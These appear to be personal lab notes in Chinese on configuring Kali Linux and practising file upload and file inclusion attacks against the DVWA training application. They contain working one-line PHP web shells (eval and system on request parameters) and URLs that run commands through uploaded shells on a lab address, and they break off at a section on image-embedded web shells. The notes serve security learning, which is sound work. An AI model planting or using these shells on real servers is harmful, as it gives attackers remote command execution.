1,kail安装好操作系统,中文乱码
配置 Kali 的 apt 命令在线安装包的源为阿里云
sudo vim /etc/apt/sources.list
deb https://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src https://mirrors.aliyun.com/kali kali-rolling main non-free contrib
sudo apt-get update
sudo apt-get install ttf-wqy-zenhei
重启后正常
文件上传漏洞
22.php <?php @eval($_POST['chopper']);?>
33.php <?php @eval($_REQUEST['chopper']);?> #eval,使用PHP函数,例如phpinfo();
http://192.168.247.136/dvwa/hackable/uploads/33.php?chopper=phpinfo();
44.php <?php @system($_REQUEST['chopper']);?> #system,使用linux系统命令,例如ls,cp,rm
http://192.168.247.136/dvwa/hackable/uploads/44.php?chopper=id
REQUEST是在网页端输入变量访问,POST则是使用像中国菜刀之类的工具连接,是C/S架构
文件包含漏洞
vim /var/www/dvwa/vulnerabilities/fi/1.php
http://192.168.247.136/dvwa/vulnerabilities/fi/?page=1.php
一句话图片木马
使用edjpgcom图片插入一句话工具插入以下内容